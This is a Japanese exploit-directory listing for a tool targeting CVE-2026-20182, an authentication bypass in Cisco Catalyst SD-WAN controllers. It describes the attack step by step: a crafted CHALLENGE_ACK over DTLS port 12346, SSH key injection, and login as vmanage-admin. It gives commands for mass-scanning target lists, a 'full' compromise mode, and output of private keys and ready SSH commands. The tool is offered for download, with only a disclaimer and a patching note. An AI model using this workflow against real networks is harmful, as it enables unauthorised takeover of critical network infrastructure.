Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20182 — Cisco Catalyst SD-WAN ピアリング認証バイパス | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-20182
認証と認可脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテストレッドチーミング
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Cisco Catalyst SD-WAN ピアリング認証バイパス

リポジトリを見る
122ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20182

Cisco Catalyst SD-WAN ピアリング認証バイパス

CVE-2026-20182 — Cisco Catalyst SD-WAN ピアリング認証バイパス

Cisco Catalyst SD-WAN Controller / Manager のピアリング認証バイパス (CVE-2026-20182) を、許可を得た環境でテストするための評価ツールです。

CVECVE-2026-20182
深刻度緊急 (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
製品Cisco Catalyst SD-WAN Controller (旧 vSmart) · Cisco Catalyst SD-WAN Manager (旧 vManage)
問題ピアリング認証メカニズムが正しく強制されない
スクリプトCVE-2026-20182.py

脆弱性の概要

2026年5月のアドバイザリ: コントロール接続のハンドシェイク / ピアリング認証の欠陥により、認証されていないリモートの攻撃者が認証をバイパスし、影響を受けるシステム上で高特権の内部アクセスを取得できる可能性があります。

攻撃者は影響を受けるシステムに細工したリクエストを送信します。成功すると、攻撃者は内部の高特権・非rootアカウントとして認証され、NETCONF に到達して SD-WAN ファブリック設定を操作できる可能性があります。

推奨事項: 公式ベンダーのガイダンスに従って Cisco のセキュリティ修正を適用してください。管理プレーンの露出を制限し、コントロールプレーンの接続を監視し、SD-WAN コントローラに不正な設定変更がないか監査してください。


連絡先

Telegram: @KNxploited


コンソールプレビュー

CVE-2026-20182 オペレーションコンソール


ツール: CVE-2026-20182.py

Cisco SD-WAN vdaemon (UDP/DTLS 12346) を標的とした CVE-2026-20182 用の Python 3 エクスプロイトフレームワークです。

機能の詳細 (ステップバイステップ)

ファブリックフォールバック: TEAR_DOWN またはパラメータ不一致時、--no-fallback が指定されていない限り、代替の domain/site プリセット (1,100)、(1,1)、(0,0) で再試行します。


結果ティア (注意深くお読みください)

重要

  • check モード → 最大でもティア 03 (バイパスプローブ)。完全なエクスプロイトの証明ではありません。
  • full モード → ティア 01 (ssh_verified) を目指します。
  • リスト内の https://host → TCP Web ヒントのみ (80/443)。443 の UDP DTLS ではありません。

要件

root@kitploit:~
pip install -r requirements.txt

OpenSSL (システム)

Windows

  1. Win64 OpenSSL 3.x または同等品をインストール
  2. bin\ を PATH に追加するか、以下を設定:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

OpenSSL を読み込めない場合、ツールは起動時に終了します。


クイックスタート

対話型メニュー (デフォルト)

root@kitploit:~
python CVE-2026-20182.py
  • オプション 1〜11 を設定し、0 = スキャン開始
  • デフォルトの実行モード: check (安全なバイパスプローブ)

非対話型 (自動化)

root@kitploit:~
python CVE-2026-20182.py -y

実行モード

CHECK — バイパスプローブのみ

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — 鍵の注入 + SSH 検証 (許可されたターゲットのみ)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

CLI リファレンス (すべてのフラグと例)

ターゲットとワーカー

-f / --file — ターゲットリスト (デフォルト: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — ワーカースレッド数 (1〜200、デフォルト 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — リストにない場合のデフォルト DOMAIN_ID (デフォルト: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — リストにない場合のデフォルト SITE_ID (デフォルト: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

モードと自動化

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — 対話型メニューをスキップし、CLI の値のみを使用

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

SSH 検証

--no-ssh-verify — 注入後の SSH テストをスキップ (full モードでは非推奨)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — 830 に加えて TCP 22 も試行

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / ファブリック

--no-try-list-udp — UDP 12346 のみ、リストの :port は無視

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — ラボ用: すべてのホストに追加の UDP ポート

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — TEAR_DOWN 時の domain/site 再試行を無効化

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

ロギング

-v / --verbose — 各プロトコル TX/RX メッセージをログに記録

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

対話型メニュー (-y 省略時)


targets.txt の形式

1行に1ターゲット。先頭が # の行は無視されます。

サンプルファイル

root@kitploit:~
# Lab controllers — authorized only
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

非対応: IPv6 (IPv4 / ホスト名のみ)。


出力ファイル

SSH コマンドの例 (ティア 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

推奨ワークフロー

1) 多数のホストをスクリーニング (高速)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

cisco_sdwan_03_bypass_only.jsonl とライブ統計の Bypass only を確認します。

2) 候補に絞り込んだホストでエクスプロイトを確認

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

cisco_sdwan_01_confirmed_ssh.jsonl — ssh_verified: true を含む唯一のファイルを確認します。

3) 単一ホストのデバッグ (詳細ログ)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

ライブテレメトリ (スキャン中)


運用上の注意

  • デフォルトモードは check — 鍵を書き出さず、単独で SSH を証明することもありません。
  • 本当の成功 = full モードでのみ ssh_verified=true。
  • パッチ適用済み / 誤ったファブリック → CHALLENGE_ACK 後に TEAR_DOWN が発生することが多いです。ファブリックフォールバックを有効にするか、リスト内の domain/site を修正してください。
  • ファイアウォールは、スキャナーからコントローラへの UDP/12346 (およびリスト内の追加 UDP ポート) を許可する必要があります。
  • sdwan_keys/ やスキャン結果を公開リポジトリにコミットしないでください。

法的免責事項

このソフトウェアは、許可を得たセキュリティ調査、防御的評価、教育のみを目的としています。

所有または運用していないシステムをテストするには、明示的な書面による許可が必要です。コンピュータシステムへの不正アクセスは違法です。作者は、本ツールの使用から生じる誤用、損害、または法的結果について一切責任を負いません。

セキュリティテストの実施について明示的に許可されているシステムとネットワークでのみ使用してください。


作者: Nxploited ( Khaled Alenazi )

ツールをダウンロード
項目詳細
攻撃元区分ネットワーク
必要な特権レベル不要
ユーザー関与レベル不要
影響範囲変更あり
影響機密性、完全性、および可用性 — 高
ステップフェーズ説明
1ターゲットの読み込みtargets.txt を解析し、(host, domain_id, site_id) で重複をマージ
2OpenSSL プリフライトカスタム DTLS 用に OpenSSL 3.x/4.x 共有ライブラリを読み込み
3DTLS 接続ターゲットの UDP ポートに接続 (常に 12346 を最初に試行し、その後リストのポートを試行)
4CHALLENGEサーバーの CHALLENGE (0x08) を受信
5CHALLENGE_ACKvHub (type 2) として細工した CHALLENGE_ACK を送信 — 認証バイパス
6HelloHello 交換を完了 — バイパス経路を確認
7aCHECK モードここで停止 — バイパス / Hello OK のみ記録 (鍵の生成や SSH は行わない)
7bFULL モードVMANAGE_TO_PEER 経由で SSH 公開鍵を注入
8Inject ACKプロトコル確認応答として REGISTER_TO_VMANAGE (0x0D) を待機
9SSH 検証TCP 830 (NETCONF)、任意で 22 で vmanage-admin としてのログインをテスト
10出力結果をティア別ファイルと人間が読めるコマンドリストに分類
ティアファイル意味
01 — SSH 確認済みcisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — 完全な侵害の証明として扱われる唯一のティア
02 — Inject ACK のみcisco_sdwan_02_inject_ack_only.jsonlプロトコルは鍵の注入を受け入れたが、SSH ログインは失敗
03 — バイパスのみcisco_sdwan_03_bypass_only.jsonlHello/バイパス OK、注入の確認なし
要件備考
Python3.9+
pipcryptography, rich
OpenSSL3.x または 4.x 共有ライブラリ (libssl + libcrypto) — 必須
モードフラグSSH 注入SSH 検証使用場面
CHECK--mode check (デフォルト)なしなし大量スクリーニング、バイパス検出
FULL--mode fullありあり (--no-ssh-verify 指定時以外)侵害の証明
#オプション
1ターゲットファイル
2ワーカースレッド数
3デフォルト DOMAIN_ID
4デフォルト SITE_ID
5モード: check / full
6TEAR_DOWN 時のファブリック自動再試行
7詳細なプロトコルログ
8注入後の SSH 検証
9SSH :22 も検証
10リストで明示された UDP ポートを試行
11追加の UDP ポート (ラボ用)
12リスト形式のヘルプを表示
0▶ スキャン開始
形式例動作
IP / ホスト名10.0.0.1UDP 12346 + デフォルトの domain/site
IP + UDP ポート10.0.0.2:12346リストの UDP ポートも試行
IP + ポート + domain + site10.0.0.3:12346:1:100完全なファブリックタプル
HTTPS URLhttps://10.0.0.4ホスト + TCP 443 ヒントのみ (UDP/443 ではない)
HTTP URLhttp://10.0.0.5TCP 80 ヒントのみ
UDP URLudp://10.0.0.6:12346明示的な UDP
タブ/カンマ区切り10.0.0.7 12346 1 1004フィールド形式と同じ
Key=value10.0.0.8;port=12346;domain=1;site=100セミコロン区切りの KV 構文
ファイル内容
cisco_sdwan_results.jsonl試行ごとの生の JSON 結果
cisco_sdwan_success.txtSSH 確認済みの行 (タブ区切り)
cisco_sdwan_01_confirmed_ssh.jsonlティア 01 — SSH 検証済み
cisco_sdwan_02_inject_ack_only.jsonlティア 02 — Inject ACK、SSH 失敗
cisco_sdwan_03_bypass_only.jsonlティア 03 — バイパス / Hello のみ
cisco_sdwan_commands.txt人間が読める SSH コマンド
cisco_sdwan_findings.jsonセッションの要約 + 件数
sdwan_keys/生成された秘密鍵 (full モード)
カウンター意味
進捗処理済みターゲット / 合計
SSH 検証済みティア 01 の件数
Inject ACKティア 02 の件数
Bypass onlyティア 03 の件数
失敗エラー / バイパスなし